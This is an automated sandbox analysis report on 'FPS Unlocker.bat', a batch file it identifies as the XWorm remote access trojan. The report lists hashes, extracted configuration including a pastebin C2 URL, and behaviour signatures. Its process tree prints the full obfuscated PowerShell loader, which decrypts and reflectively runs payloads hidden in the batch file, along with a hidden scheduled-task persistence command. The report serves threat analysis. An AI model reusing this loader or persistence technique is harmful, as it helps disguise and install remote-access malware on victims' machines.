Overview

overview

10

Static

static

1

FPS Unlocker.bat

windows7-x64

8

FPS Unlocker.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/10/2024, 05:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FPS Unlocker.bat

  • Size

    58KB

  • MD5

    fdcd595fc134f6bd095d5b34ffd3b71f

  • SHA1

    ba04fa3f61319022e0c440f1824cd3de9b31942b

  • SHA256

    5ab4907cb69c12aba76ffd0df1d013abf6caee8c9f9b82855ed548e5e6aba649

  • SHA512

    810903554bd118c0496b3b057bb52ee65a61fc77bb93b2f278e81542ff24087a7eec3b3d6f0dd4dffea8f6c8afbbbbbeb4479a11c7eef5c6a632e200bbe4f6a1

  • SSDEEP

    1536:LT5d8DaHBOodkL16YbyEjEiQQ/MhQbE55q5YsmrI5e:LLBH21DjE/hQbEqzLe

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

00BaklpoEsEvi6Pr

Attributes
  • Install_directory

    %AppData%

  • install_file

    Fortnite.exe

  • pastebin_url

    https://pastebin.com/raw/mUZNKkBb

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FPS Unlocker.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('02dT/qDjBObYCIde39bhpxP7Rv4WFyCQXO19DwqYNvk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/DJ3kbH9oCvlgtuTzC7x8A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RiEgk=New-Object System.IO.MemoryStream(,$param_var); $UYezQ=New-Object System.IO.MemoryStream; $vneVX=New-Object System.IO.Compression.GZipStream($RiEgk, [IO.Compression.CompressionMode]::Decompress); $vneVX.CopyTo($UYezQ); $vneVX.Dispose(); $RiEgk.Dispose(); $UYezQ.Dispose(); $UYezQ.ToArray();}function execute_function($param_var,$param2_var){ $eLMOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dGEdy=$eLMOd.EntryPoint; $dGEdy.Invoke($null, $param2_var);}$UZgKG = 'C:\Users\Admin\AppData\Local\Temp\FPS Unlocker.bat';$host.UI.RawUI.WindowTitle = $UZgKG;$hmELN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UZgKG).Split([Environment]::NewLine);foreach ($vRlkd in $hmELN) { if ($vRlkd.StartsWith(':: ')) { $RMfcd=$vRlkd.Substring(3); break; }}$payloads_var=[string[]]$RMfcd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_255_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_255.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:700
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_255.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2108
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_255.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4960
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('02dT/qDjBObYCIde39bhpxP7Rv4WFyCQXO19DwqYNvk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/DJ3kbH9oCvlgtuTzC7x8A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RiEgk=New-Object System.IO.MemoryStream(,$param_var); $UYezQ=New-Object System.IO.MemoryStream; $vneVX=New-Object System.IO.Compression.GZipStream($RiEgk, [IO.Compression.CompressionMode]::Decompress); $vneVX.CopyTo($UYezQ); $vneVX.Dispose(); $RiEgk.Dispose(); $UYezQ.Dispose(); $UYezQ.ToArray();}function execute_function($param_var,$param2_var){ $eLMOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dGEdy=$eLMOd.EntryPoint; $dGEdy.Invoke($null, $param2_var);}$UZgKG = 'C:\Users\Admin\AppData\Roaming\startup_str_255.bat';$host.UI.RawUI.WindowTitle = $UZgKG;$hmELN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UZgKG).Split([Environment]::NewLine);foreach ($vRlkd in $hmELN) { if ($vRlkd.StartsWith(':: ')) { $RMfcd=$vRlkd.Substring(3); break; }}$payloads_var=[string[]]$RMfcd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:100

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    eaa37f52aea06b09f25bf372644caa78

    SHA1

    3169bed248b204a5ac430bc1dee92e156b586cbb

    SHA256

    40dd61cdf8dcaa558901712c6c0377cfe0c30cf5db14d2d951c556a107dc6ec2

    SHA512

    125e7b974953efb0d631a00a67742da3abc60c5231435392b4668299aa10cbda08063fe39f0ab2e9f5c933ddf65f58e097e75cb9b8e95b6dfd42ea1cf171a0de

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygilles2.4kr.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpB939.tmp
    Filesize

    100KB

    MD5

    1b942faa8e8b1008a8c3c1004ba57349

    SHA1

    cd99977f6c1819b12b33240b784ca816dfe2cb91

    SHA256

    555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc

    SHA512

    5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_255.bat
    Filesize

    58KB

    MD5

    fdcd595fc134f6bd095d5b34ffd3b71f

    SHA1

    ba04fa3f61319022e0c440f1824cd3de9b31942b

    SHA256

    5ab4907cb69c12aba76ffd0df1d013abf6caee8c9f9b82855ed548e5e6aba649

    SHA512

    810903554bd118c0496b3b057bb52ee65a61fc77bb93b2f278e81542ff24087a7eec3b3d6f0dd4dffea8f6c8afbbbbbeb4479a11c7eef5c6a632e200bbe4f6a1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_255.vbs
    Filesize

    115B

    MD5

    00b6d4b686b4c77d3df162d1d0e1690a

    SHA1

    58ecd61148c0a5ced748fd3f59dae56c58bd07d2

    SHA256

    9dbe56a8dc1f928f752db0e772fb00a11c9047a5ea7a5a9473cb571a89f02891

    SHA512

    39d630b94c4b9f6a4e03bb5478d1a4e31fb404835282698c810b3861af5ad9c72a778cc0030cd7744c9bb4441e3598b1c5549b8344de08da37d913ef4046b040

    Download Submit

  • memory/100-56-0x000001C2C4840000-0x000001C2C487A000-memory.dmp

    Filesize

    232KB

    Download

  • memory/100-49-0x000001C2C4280000-0x000001C2C4290000-memory.dmp

    Filesize

    64KB

    Download

  • memory/100-65-0x000001C2C48C0000-0x000001C2C48CC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/100-64-0x000001C2C6100000-0x000001C2C6628000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/100-63-0x000001C2C5000000-0x000001C2C50B0000-memory.dmp

    Filesize

    704KB

    Download

  • memory/100-61-0x000001C2C4530000-0x000001C2C453A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/100-55-0x000001C2C4510000-0x000001C2C451C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/556-14-0x000002C5D04F0000-0x000002C5D04FE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/556-11-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/556-12-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/556-50-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/556-13-0x000002C5B6080000-0x000002C5B6088000-memory.dmp

    Filesize

    32KB

    Download

  • memory/556-0-0x00007FFE63933000-0x00007FFE63935000-memory.dmp

    Filesize

    8KB

    Download

  • memory/556-6-0x000002C5B6090000-0x000002C5B60B2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/700-25-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/700-30-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/700-27-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/700-26-0x00007FFE63930000-0x00007FFE643F1000-memory.dmp

    Filesize

    10.8MB

    Download